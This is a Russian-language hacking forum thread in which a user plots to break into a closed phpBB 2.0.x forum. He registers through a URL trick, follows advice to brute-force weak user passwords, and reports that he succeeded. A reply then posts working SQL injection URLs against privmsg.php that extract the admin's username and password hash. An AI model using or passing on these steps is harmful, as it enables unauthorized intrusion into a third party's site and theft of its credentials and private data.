Есть сабж такой версии. Админка закрыта BASIC-AUTH. Сам форум тоже наполовину закрыт. Виден только список пользователей и подфорумы. Только что подставил profile.php?mode=register&agreed=true и зарегился. Но активировать должен админ. Как быть в таком случае? Что вообще можно сделать с ним? Цель - получить инфу в форуме. Попробовал несколько способов 2.0.10 и выше - не сработали
Ниче ты тут не сделаешь без активации.... Поищи уже активных юзверей по паролям типа 123, qwerty и т.д. а дальше можно и сплоитом.
да я вот и ищу. думал может еще какой то способ есть. ведь форум то старый. хотя некоторые заплатки поставили. а если найду пасс для юзеря - то впринципе уже ничего и ненадо будет. ========================= УРА! Отбрутил пасс. Как теперь можно копнуть в сторону админа?
Программа: phpBB 2.0.8 Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость в проверке правильности входных данных обнаружена в phpBB в 'privmsg.php' сценарии. Удаленный пользователь может внедрить произвольный SQL код. Пример: _http://localhost/phpbb206c/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm .privmsgs_type=-99%20UNION%20SELECT%20username,null,user_password,null,null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/* /privmsg.php?folder=savebox&mode=read&p=99&pm_sql_user=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/* URL производителя: http://www.phpbb.com/
А воще qBiN Яисал уязвимости форумов php-bb до последней версии. http://www.forum.antichat.ru/thread12610.htmlю Закрывайте тему.
"Яисал" типа я писал? Учимся писать попонятнее) Тема закрыта,ибо все остальное можно найти в поиске\прикрепленных темах
